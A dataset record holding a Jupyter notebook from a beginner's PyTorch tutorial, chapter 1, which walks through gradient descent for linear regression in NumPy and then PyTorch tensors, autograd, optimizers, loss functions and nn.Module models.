"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2a471d5b467deea82da8954e6c89d87c9c28dc | 130,824 | ipynb | Jupyter Notebook | Chapter01.ipynb | ridhimagarg/PyTorchStepByStep | 7b8b5b10834cd6b4afe47a5a5495dc07c490ca34 | [
"MIT"
] | 1 | 2022-03-10T09:12:58.000Z | 2022-03-10T09:12:58.000Z | Chapter01.ipynb | ridhimagarg/PyTorchStepByStep | 7b8b5b10834cd6b4afe47a5a5495dc07c490ca34 | [
"MIT"
] | null | null | null | Chapter01.ipynb | ridhimagarg/PyTorchStepByStep | 7b8b5b10834cd6b4afe47a5a5495dc07c490ca34 | [
"MIT"
] | null | null | null | 53.310513 | 32,336 | 0.723132 | [
[
[
"# Deep Learning with PyTorch Step-by-Step: A Beginner's Guide",
"_____no_output_____"
],
[
"# Chapter 1",
"_____no_output_____"
]
],
[
[
"try:\n import google.colab\n import requests\n url = 'https://raw.githubusercontent.com/dvgodoy/PyTorchStepByStep/master/config.py'\n r = requests.get(url, allow_redirects=True)\n open('config.py', 'wb').write(r.content) \nexcept ModuleNotFoundError:\n pass\n\nfrom config import *\nconfig_chapter1()\n# This is needed to render the plots in this chapter\nfrom plots.chapter1 import *",
"_____no_output_____"
],
[
"import numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom torchviz import make_dot",
"_____no_output_____"
]
],
[
[
"# A Simple Regression Problem\n\n$$\n\\Large y = b + w x + \\epsilon\n$$",
"_____no_output_____"
],
[
"## Data Generation",
"_____no_output_____"
],
[
"### Synthetic Data Generation",
"_____no_output_____"
]
],
[
[
"true_b = 1\ntrue_w = 2\nN = 100\n\n# Data Generation\nnp.random.seed(42)\nx = np.random.rand(N, 1)\nepsilon = (.1 * np.random.randn(N, 1))\ny = true_b + true_w * x + epsilon",
"_____no_output_____"
]
],
[
[
"### Cell 1.1",
"_____no_output_____"
]
],
[
[
"# Shuffles the indices\nidx = np.arange(N)\nnp.random.shuffle(idx)\n\n# Uses first 80 random indices for train\ntrain_idx = idx[:int(N*.8)]\n# Uses the remaining indices for validation\nval_idx = idx[int(N*.8):]\n\n# Generates train and validation sets\nx_train, y_train = x[train_idx], y[train_idx]\nx_val, y_val = x[val_idx], y[val_idx]",
"_____no_output_____"
],
[
"figure1(x_train, y_train, x_val, y_val)",
"_____no_output_____"
]
],
[
[
"# Gradient Descent",
"_____no_output_____"
],
[
"## Step 0: Random Initialization",
"_____no_output_____"
]
],
[
[
"# Step 0 - Initializes parameters \"b\" and \"w\" randomly\nnp.random.seed(42)\nb = np.random.randn(1)\nw = np.random.randn(1)\n\nprint(b, w)",
"[0.49671415] [-0.1382643]\n"
]
],
[
[
"## Step 1: Compute Model's Predictions",
"_____no_output_____"
]
],
[
[
"# Step 1 - Computes our model's predicted output - forward pass\nyhat = b + w * x_train",
"_____no_output_____"
]
],
[
[
"## Step 2: Compute the Loss",
"_____no_output_____"
]
],
[
[
"# Step 2 - Computing the loss\n# We are using ALL data points, so this is BATCH gradient\n# descent. How wrong is our model? That's the error!\nerror = (yhat - y_train)\n\n# It is a regression, so it computes mean squared error (MSE)\nloss = (error ** 2).mean()\n\nprint(loss)",
"2.7421577700550976\n"
]
],
[
[
"## Step 3: Compute the Gradients",
"_____no_output_____"
]
],
[
[
"# Step 3 - Computes gradients for both \"b\" and \"w\" parameters\nb_grad = 2 * error.mean()\nw_grad = 2 * (x_train * error).mean()\nprint(b_grad, w_grad)",
"-3.044811379650508 -1.8337537171510832\n"
]
],
[
[
"## Step 4: Update the Parameters",
"_____no_output_____"
]
],
[
[
"# Sets learning rate - this is \"eta\" ~ the \"n\" like Greek letter\nlr = 0.1\nprint(b, w)\n\n# Step 4 - Updates parameters using gradients and \n# the learning rate\nb = b - lr * b_grad\nw = w - lr * w_grad\n\nprint(b, w)",
"[0.49671415] [-0.1382643]\n[0.80119529] [0.04511107]\n"
]
],
[
[
"## Step 5: Rinse and Repeat!",
"_____no_output_____"
]
],
[
[
"# Go back to Step 1 and run observe how your parameters b and w change",
"_____no_output_____"
]
],
[
[
"# Linear Regression in Numpy",
"_____no_output_____"
],
[
"### Cell 1.2",
"_____no_output_____"
]
],
[
[
"# Step 0 - Initializes parameters \"b\" and \"w\" randomly\nnp.random.seed(42)\nb = np.random.randn(1)\nw = np.random.randn(1)\n\nprint(b, w)\n\n# Sets learning rate - this is \"eta\" ~ the \"n\"-like Greek letter\nlr = 0.1\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n # Step 1 - Computes model's predicted output - forward pass\n yhat = b + w * x_train\n \n # Step 2 - Computes the loss\n # We are using ALL data points, so this is BATCH gradient\n # descent. How wrong is our model? That's the error! \n error = (yhat - y_train)\n # It is a regression, so it computes mean squared error (MSE)\n loss = (error ** 2).mean()\n \n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n b_grad = 2 * error.mean()\n w_grad = 2 * (x_train * error).mean()\n \n # Step 4 - Updates parameters using gradients and \n # the learning rate\n b = b - lr * b_grad\n w = w - lr * w_grad\n \nprint(b, w)",
"[0.49671415] [-0.1382643]\n[1.02354094] [1.96896411]\n"
],
[
"# Sanity Check: do we get the same results as our\n# gradient descent?\nlinr = LinearRegression()\nlinr.fit(x_train, y_train)\nprint(linr.intercept_, linr.coef_[0])",
"[1.02354075] [1.96896447]\n"
],
[
"fig = figure3(x_train, y_train)",
"_____no_output_____"
]
],
[
[
"# PyTorch",
"_____no_output_____"
],
[
"## Tensor",
"_____no_output_____"
]
],
[
[
"scalar = torch.tensor(3.14159)\nvector = torch.tensor([1, 2, 3])\nmatrix = torch.ones((2, 3), dtype=torch.float)\ntensor = torch.randn((2, 3, 4), dtype=torch.float)\n\nprint(scalar)\nprint(vector)\nprint(matrix)\nprint(tensor)",
"tensor(3.1416)\ntensor([1, 2, 3])\ntensor([[1., 1., 1.],\n [1., 1., 1.]])\ntensor([[[ 1.2189, -0.7499, 1.1768, 0.1267],\n [ 1.1126, -1.0030, -0.5765, -0.2187],\n [-0.3212, 0.7264, 1.3247, 0.7378]],\n\n [[-0.4538, 1.2395, -1.8186, -0.2005],\n [ 0.0404, -0.4431, 2.4759, 0.9298],\n [ 0.8922, 1.6280, -0.8904, 1.8739]]])\n"
],
[
"print(tensor.size(), tensor.shape)",
"torch.Size([2, 3, 4]) torch.Size([2, 3, 4])\n"
],
[
"print(scalar.size(), scalar.shape)",
"torch.Size([]) torch.Size([])\n"
],
[
"# We get a tensor with a different shape but it still is\n# the SAME tensor\nsame_matrix = matrix.view(1, 6)\n# If we change one of its elements...\nsame_matrix[0, 1] = 2.\n# It changes both variables: matrix and same_matrix\nprint(matrix)\nprint(same_matrix)",
"tensor([[1., 2., 1.],\n [1., 1., 1.]])\ntensor([[1., 2., 1., 1., 1., 1.]])\n"
],
[
"# We can use \"new_tensor\" method to REALLY copy it into a new one\ndifferent_matrix = matrix.new_tensor(matrix.view(1, 6))\n# Now, if we change one of its elements...\ndifferent_matrix[0, 1] = 3.\n# The original tensor (matrix) is left untouched!\n# But we get a \"warning\" from PyTorch telling us \n# to use \"clone()\" instead!\nprint(matrix)\nprint(different_matrix)",
"tensor([[1., 2., 1.],\n [1., 1., 1.]])\ntensor([[1., 3., 1., 1., 1., 1.]])\n"
],
[
"# Lets follow PyTorch's suggestion and use \"clone\" method\nanother_matrix = matrix.view(1, 6).clone().detach()\n# Again, if we change one of its elements...\nanother_matrix[0, 1] = 4.\n# The original tensor (matrix) is left untouched!\nprint(matrix)\nprint(another_matrix)",
"tensor([[1., 2., 1.],\n [1., 1., 1.]])\ntensor([[1., 4., 1., 1., 1., 1.]])\n"
]
],
[
[
"## Loading Data, Devices and CUDA",
"_____no_output_____"
]
],
[
[
"x_train_tensor = torch.as_tensor(x_train)\nx_train.dtype, x_train_tensor.dtype",
"_____no_output_____"
],
[
"float_tensor = x_train_tensor.float()\nfloat_tensor.dtype",
"_____no_output_____"
],
[
"dummy_array = np.array([1, 2, 3])\ndummy_tensor = torch.as_tensor(dummy_array)\n# Modifies the numpy array\ndummy_array[1] = 0\n# Tensor gets modified too...\ndummy_tensor",
"_____no_output_____"
],
[
"dummy_tensor.numpy()",
"_____no_output_____"
]
],
[
[
"### Defining your device",
"_____no_output_____"
]
],
[
[
"device = 'cuda' if torch.cuda.is_available() else 'cpu'",
"_____no_output_____"
],
[
"n_cudas = torch.cuda.device_count()\nfor i in range(n_cudas):\n print(torch.cuda.get_device_name(i))",
"_____no_output_____"
],
[
"gpu_tensor = torch.as_tensor(x_train).to(device)\ngpu_tensor[0]",
"_____no_output_____"
]
],
[
[
"### Cell 1.3",
"_____no_output_____"
]
],
[
[
"device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Our data was in Numpy arrays, but we need to transform them \n# into PyTorch's Tensors and then we send them to the \n# chosen device\nx_train_tensor = torch.as_tensor(x_train).float().to(device)\ny_train_tensor = torch.as_tensor(y_train).float().to(device)",
"_____no_output_____"
],
[
"# Here we can see the difference - notice that .type() is more\n# useful since it also tells us WHERE the tensor is (device)\nprint(type(x_train), type(x_train_tensor), x_train_tensor.type())",
"<class 'numpy.ndarray'> <class 'torch.Tensor'> torch.FloatTensor\n"
],
[
"back_to_numpy = x_train_tensor.numpy()",
"_____no_output_____"
],
[
"back_to_numpy = x_train_tensor.cpu().numpy()",
"_____no_output_____"
]
],
[
[
"## Creating Parameters",
"_____no_output_____"
]
],
[
[
"# FIRST\n# Initializes parameters \"b\" and \"w\" randomly, ALMOST as we\n# did in Numpy since we want to apply gradient descent on\n# these parameters we need to set REQUIRES_GRAD = TRUE\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, dtype=torch.float)\nw = torch.randn(1, requires_grad=True, dtype=torch.float)\nprint(b, w)",
"tensor([0.3367], requires_grad=True) tensor([0.1288], requires_grad=True)\n"
],
[
"# SECOND\n# But what if we want to run it on a GPU? We could just\n# send them to device, right?\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, dtype=torch.float).to(device)\nw = torch.randn(1, requires_grad=True, dtype=torch.float).to(device)\nprint(b, w)\n# Sorry, but NO! The to(device) \"shadows\" the gradient...",
"tensor([0.3367], requires_grad=True) tensor([0.1288], requires_grad=True)\n"
],
[
"# THIRD\n# We can either create regular tensors and send them to\n# the device (as we did with our data)\ntorch.manual_seed(42)\nb = torch.randn(1, dtype=torch.float).to(device)\nw = torch.randn(1, dtype=torch.float).to(device)\n# and THEN set them as requiring gradients...\nb.requires_grad_()\nw.requires_grad_()\nprint(b, w)",
"tensor([0.3367], requires_grad=True) tensor([0.1288], requires_grad=True)\n"
]
],
[
[
"### Cell 1.4",
"_____no_output_____"
]
],
[
[
"# FINAL\n# We can specify the device at the moment of creation\n# RECOMMENDED!\n\n# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nprint(b, w)",
"tensor([0.3367], requires_grad=True) tensor([0.1288], requires_grad=True)\n"
]
],
[
[
"# Autograd",
"_____no_output_____"
],
[
"## backward",
"_____no_output_____"
],
[
"### Cell 1.5",
"_____no_output_____"
]
],
[
[
"# Step 1 - Computes our model's predicted output - forward pass\nyhat = b + w * x_train_tensor\n\n# Step 2 - Computes the loss\n# We are using ALL data points, so this is BATCH gradient descent\n# How wrong is our model? That's the error! \nerror = (yhat - y_train_tensor)\n# It is a regression, so it computes mean squared error (MSE)\nloss = (error ** 2).mean()\n\n# Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n# No more manual computation of gradients! \n# b_grad = 2 * error.mean()\n# w_grad = 2 * (x_tensor * error).mean()\nloss.backward()",
"_____no_output_____"
],
[
"print(error.requires_grad, yhat.requires_grad, \\\n b.requires_grad, w.requires_grad)\nprint(y_train_tensor.requires_grad, x_train_tensor.requires_grad)",
"True True True True\nFalse False\n"
]
],
[
[
"## grad",
"_____no_output_____"
]
],
[
[
"print(b.grad, w.grad)",
"tensor([-3.1125]) tensor([-1.8156])\n"
],
[
"# Just run the two cells above one more time ",
"_____no_output_____"
]
],
[
[
"## zero_",
"_____no_output_____"
]
],
[
[
"# This code will be placed *after* Step 4\n# (updating the parameters)\nb.grad.zero_(), w.grad.zero_()",
"_____no_output_____"
]
],
[
[
"## Updating Parameters",
"_____no_output_____"
],
[
"### Cell 1.6",
"_____no_output_____"
]
],
[
[
"# Sets learning rate - this is \"eta\" ~ the \"n\"-like Greek letter\nlr = 0.1\n\n# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n # Step 1 - Computes model's predicted output - forward pass\n yhat = b + w * x_train_tensor\n \n # Step 2 - Computes the loss\n # We are using ALL data points, so this is BATCH gradient\n # descent. How wrong is our model? That's the error!\n error = (yhat - y_train_tensor)\n # It is a regression, so it computes mean squared error (MSE)\n loss = (error ** 2).mean()\n\n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n # No more manual computation of gradients! \n # b_grad = 2 * error.mean()\n # w_grad = 2 * (x_tensor * error).mean() \n # We just tell PyTorch to work its way BACKWARDS \n # from the specified loss!\n loss.backward()\n \n # Step 4 - Updates parameters using gradients and \n # the learning rate. But not so fast...\n # FIRST ATTEMPT - just using the same code as before\n # AttributeError: 'NoneType' object has no attribute 'zero_'\n # b = b - lr * b.grad\n # w = w - lr * w.grad\n # print(b)\n\n # SECOND ATTEMPT - using in-place Python assigment\n # RuntimeError: a leaf Variable that requires grad\n # has been used in an in-place operation.\n # b -= lr * b.grad\n # w -= lr * w.grad \n \n # THIRD ATTEMPT - NO_GRAD for the win!\n # We need to use NO_GRAD to keep the update out of\n # the gradient computation. Why is that? It boils \n # down to the DYNAMIC GRAPH that PyTorch uses...\n with torch.no_grad():\n b -= lr * b.grad\n w -= lr * w.grad\n \n # PyTorch is \"clingy\" to its computed gradients, we\n # need to tell it to let it go...\n b.grad.zero_()\n w.grad.zero_()\n \nprint(b, w)",
"tensor([1.0235], requires_grad=True) tensor([1.9690], requires_grad=True)\n"
]
],
[
[
"## no_grad",
"_____no_output_____"
]
],
[
[
"# This is what we used in the THIRD ATTEMPT...",
"_____no_output_____"
]
],
[
[
"# Dynamic Computation Graph",
"_____no_output_____"
]
],
[
[
"# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\n# Step 1 - Computes our model's predicted output - forward pass\nyhat = b + w * x_train_tensor\n\n# Step 2 - Computes the loss\n# We are using ALL data points, so this is BATCH gradient\n# descent. How wrong is our model? That's the error! \nerror = (yhat - y_train_tensor)\n# It is a regression, so it computes mean squared error (MSE)\nloss = (error ** 2).mean()\n\n# We can try plotting the graph for any python variable: \n# yhat, error, loss...\nmake_dot(yhat)",
"_____no_output_____"
],
[
"b_nograd = torch.randn(1, requires_grad=False, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\nyhat = b_nograd + w * x_train_tensor\n\nmake_dot(yhat)",
"_____no_output_____"
],
[
"b = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\nyhat = b + w * x_train_tensor\nerror = yhat - y_train_tensor\nloss = (error ** 2).mean()\n\n# this makes no sense!!\nif loss > 0:\n yhat2 = w * x_train_tensor\n error2 = yhat2 - y_train_tensor\n \n# neither does this :-)\nloss += error2.mean()\n\nmake_dot(loss)",
"_____no_output_____"
]
],
[
[
"# Optimizer",
"_____no_output_____"
],
[
"## step / zero_grad",
"_____no_output_____"
]
],
[
[
"# Defines a SGD optimizer to update the parameters\noptimizer = optim.SGD([b, w], lr=lr)",
"_____no_output_____"
]
],
[
[
"### Cell 1.7",
"_____no_output_____"
]
],
[
[
"# Sets learning rate - this is \"eta\" ~ the \"n\"-like Greek letter\nlr = 0.1\n\n# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\n# Defines a SGD optimizer to update the parameters\noptimizer = optim.SGD([b, w], lr=lr)\n\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n # Step 1 - Computes model's predicted output - forward pass\n yhat = b + w * x_train_tensor\n \n # Step 2 - Computes the loss\n # We are using ALL data points, so this is BATCH gradient \n # descent. How wrong is our model? That's the error! \n error = (yhat - y_train_tensor)\n # It is a regression, so it computes mean squared error (MSE)\n loss = (error ** 2).mean()\n\n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n loss.backward()\n \n # Step 4 - Updates parameters using gradients and \n # the learning rate. No more manual update!\n # with torch.no_grad():\n # b -= lr * b.grad\n # w -= lr * w.grad\n optimizer.step()\n \n # No more telling Pytorch to let gradients go!\n # b.grad.zero_()\n # w.grad.zero_()\n optimizer.zero_grad()\n \nprint(b, w)",
"tensor([1.0235], requires_grad=True) tensor([1.9690], requires_grad=True)\n"
]
],
[
[
"# Loss",
"_____no_output_____"
]
],
[
[
"# Defines a MSE loss function\nloss_fn = nn.MSELoss(reduction='mean')\nloss_fn",
"_____no_output_____"
],
[
"# This is a random example to illustrate the loss function\npredictions = torch.tensor([0.5, 1.0])\nlabels = torch.tensor([2.0, 1.3])\nloss_fn(predictions, labels)",
"_____no_output_____"
]
],
[
[
"### Cell 1.8",
"_____no_output_____"
]
],
[
[
"# Sets learning rate - this is \"eta\" ~ the \"n\"-like\n# Greek letter\nlr = 0.1\n\n# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\n# Defines a SGD optimizer to update the parameters\noptimizer = optim.SGD([b, w], lr=lr)\n\n# Defines a MSE loss function\nloss_fn = nn.MSELoss(reduction='mean')\n\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n # Step 1 - Computes model's predicted output - forward pass\n yhat = b + w * x_train_tensor\n \n # Step 2 - Computes the loss\n # No more manual loss!\n # error = (yhat - y_train_tensor)\n # loss = (error ** 2).mean()\n loss = loss_fn(yhat, y_train_tensor)\n\n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n loss.backward()\n \n # Step 4 - Updates parameters using gradients and\n # the learning rate\n optimizer.step()\n optimizer.zero_grad()\n \nprint(b, w)",
"tensor([1.0235], requires_grad=True) tensor([1.9690], requires_grad=True)\n"
],
[
"loss",
"_____no_output_____"
],
[
"loss.cpu().numpy()",
"_____no_output_____"
],
[
"loss.detach().cpu().numpy()",
"_____no_output_____"
],
[
"print(loss.item(), loss.tolist())",
"0.008044655434787273 0.008044655434787273\n"
]
],
[
[
"# Model",
"_____no_output_____"
],
[
"### Cell 1.9",
"_____no_output_____"
]
],
[
[
"class ManualLinearRegression(nn.Module):\n def __init__(self):\n super().__init__()\n # To make \"b\" and \"w\" real parameters of the model,\n # we need to wrap them with nn.Parameter\n self.b = nn.Parameter(torch.randn(1,\n requires_grad=True, \n dtype=torch.float))\n self.w = nn.Parameter(torch.randn(1, \n requires_grad=True,\n dtype=torch.float))\n \n def forward(self, x):\n # Computes the outputs / predictions\n return self.b + self.w * x",
"_____no_output_____"
]
],
[
[
"## Parameters",
"_____no_output_____"
]
],
[
[
"torch.manual_seed(42)\n# Creates a \"dummy\" instance of our ManualLinearRegression model\ndummy = ManualLinearRegression()\nlist(dummy.parameters())",
"_____no_output_____"
]
],
[
[
"## state_dict",
"_____no_output_____"
]
],
[
[
"dummy.state_dict()",
"_____no_output_____"
],
[
"optimizer.state_dict()",
"_____no_output_____"
]
],
[
[
"## device",
"_____no_output_____"
]
],
[
[
"torch.manual_seed(42)\n# Creates a \"dummy\" instance of our ManualLinearRegression model\n# and sends it to the device\ndummy = ManualLinearRegression().to(device)",
"_____no_output_____"
]
],
[
[
"## Forward Pass",
"_____no_output_____"
],
[
"### Cell 1.10",
"_____no_output_____"
]
],
[
[
"# Sets learning rate - this is \"eta\" ~ the \"n\"-like\n# Greek letter\nlr = 0.1\n\n# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\n# Now we can create a model and send it at once to the device\nmodel = ManualLinearRegression().to(device)\n\n# Defines a SGD optimizer to update the parameters \n# (now retrieved directly from the model)\noptimizer = optim.SGD(model.parameters(), lr=lr)\n\n# Defines a MSE loss function\nloss_fn = nn.MSELoss(reduction='mean')\n\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n model.train() # What is this?!?\n\n # Step 1 - Computes model's predicted output - forward pass\n # No more manual prediction!\n yhat = model(x_train_tensor)\n \n # Step 2 - Computes the loss\n loss = loss_fn(yhat, y_train_tensor)\n\n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n loss.backward()\n \n # Step 4 - Updates parameters using gradients and\n # the learning rate\n optimizer.step()\n optimizer.zero_grad()\n \n# We can also inspect its parameters using its state_dict\nprint(model.state_dict())",
"OrderedDict([('b', tensor([1.0235])), ('w', tensor([1.9690]))])\n"
]
],
[
[
"## train",
"_____no_output_____"
]
],
[
[
"## Never forget to include model.train() in your training loop!",
"_____no_output_____"
]
],
[
[
"## Nested Models",
"_____no_output_____"
]
],
[
[
"linear = nn.Linear(1, 1)\nlinear",
"_____no_output_____"
],
[
"linear.state_dict()",
"_____no_output_____"
]
],
[
[
"### Cell 1.11",
"_____no_output_____"
]
],
[
[
"class MyLinearRegression(nn.Module):\n def __init__(self):\n super().__init__()\n # Instead of our custom parameters, we use a Linear model\n # with single input and single output\n self.linear = nn.Linear(1, 1)\n \n def forward(self, x):\n # Now it only takes a call\n self.linear(x)",
"_____no_output_____"
],
[
"torch.manual_seed(42)\ndummy = MyLinearRegression().to(device)\nlist(dummy.parameters())",
"_____no_output_____"
],
[
"dummy.state_dict()",
"_____no_output_____"
]
],
[
[
"## Sequential Models",
"_____no_output_____"
],
[
"### Cell 1.12",
"_____no_output_____"
]
],
[
[
"torch.manual_seed(42)\n# Alternatively, you can use a Sequential model\nmodel = nn.Sequential(nn.Linear(1, 1)).to(device)\n\nmodel.state_dict()",
"_____no_output_____"
]
],
[
[
"## Layers",
"_____no_output_____"
]
],
[
[
"torch.manual_seed(42)\n# Building the model from the figure above\nmodel = nn.Sequential(nn.Linear(3, 5), nn.Linear(5, 1)).to(device)\n\nmodel.state_dict()",
"_____no_output_____"
],
[
"torch.manual_seed(42)\n# Building the model from the figure above\nmodel = nn.Sequential()\nmodel.add_module('layer1', nn.Linear(3, 5))\nmodel.add_module('layer2', nn.Linear(5, 1))\nmodel.to(device)",
"_____no_output_____"
]
],
[
[
"# Putting It All Together",
"_____no_output_____"
],
[
"## Data Preparation",
"_____no_output_____"
],
[
"### Data Preparation V0",
"_____no_output_____"
]
],
[
[
"%%writefile data_preparation/v0.py\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Our data was in Numpy arrays, but we need to transform them\n# into PyTorch's Tensors and then we send them to the \n# chosen device\nx_train_tensor = torch.as_tensor(x_train).float().to(device)\ny_train_tensor = torch.as_tensor(y_train).float().to(device)",
"Overwriting data_preparation/v0.py\n"
],
[
"%run -i data_preparation/v0.py",
"_____no_output_____"
]
],
[
[
"## Model Configurtion",
"_____no_output_____"
],
[
"### Model Configuration V0",
"_____no_output_____"
]
],
[
[
"%%writefile model_configuration/v0.py\n\n# This is redundant now, but it won't be when we introduce\n# Datasets...\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Sets learning rate - this is \"eta\" ~ the \"n\"-like Greek letter\nlr = 0.1\n\ntorch.manual_seed(42)\n# Now we can create a model and send it at once to the device\nmodel = nn.Sequential(nn.Linear(1, 1)).to(device)\n\n# Defines a SGD optimizer to update the parameters \n# (now retrieved directly from the model)\noptimizer = optim.SGD(model.parameters(), lr=lr)\n\n# Defines a MSE loss function\nloss_fn = nn.MSELoss(reduction='mean')",
"Overwriting model_configuration/v0.py\n"
],
[
"%run -i model_configuration/v0.py",
"_____no_output_____"
]
],
[
[
"## Model Training",
"_____no_output_____"
],
[
"### Model Training V0",
"_____no_output_____"
]
],
[
[
"%%writefile model_training/v0.py\n\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n # Sets model to TRAIN mode\n model.train()\n\n # Step 1 - Computes model's predicted output - forward pass\n yhat = model(x_train_tensor)\n \n # Step 2 - Computes the loss\n loss = loss_fn(yhat, y_train_tensor)\n\n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n loss.backward()\n \n # Step 4 - Updates parameters using gradients and \n # the learning rate\n optimizer.step()\n optimizer.zero_grad()",
"Overwriting model_training/v0.py\n"
],
[
"%run -i model_training/v0.py",
"_____no_output_____"
],
[
"print(model.state_dict())",
"OrderedDict([('0.weight', tensor([[1.9690]], device='cuda:0')), ('0.bias', tensor([1.0235], device='cuda:0'))])\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb2a673ca61dba56314fbfb5a1f12fe1375945b7 | 708,322 | ipynb | Jupyter Notebook | woche4/notebooks/transfer-learning/transfer-learning.ipynb | aheyer/deeplearning2020 | 0bd8807649c3de9266a8fd73d03e05ed2e5b0cb9 | [
"MIT"
] | 133 | 2020-03-11T09:56:22.000Z | 2022-01-03T08:27:00.000Z | woche4/notebooks/transfer-learning/transfer-learning.ipynb | aheyer/deeplearning2020 | 0bd8807649c3de9266a8fd73d03e05ed2e5b0cb9 | [
"MIT"
] | 10 | 2020-03-12T15:02:46.000Z | 2020-11-27T21:21:42.000Z | woche4/notebooks/transfer-learning/transfer-learning.ipynb | aheyer/deeplearning2020 | 0bd8807649c3de9266a8fd73d03e05ed2e5b0cb9 | [
"MIT"
] | 64 | 2020-03-12T08:11:38.000Z | 2021-06-25T08:45:53.000Z | 645.690064 | 607,726 | 0.927787 | [
[
[
"# Transfer Learning\n## Imports and Version Selection\n",
"_____no_output_____"
]
],
[
[
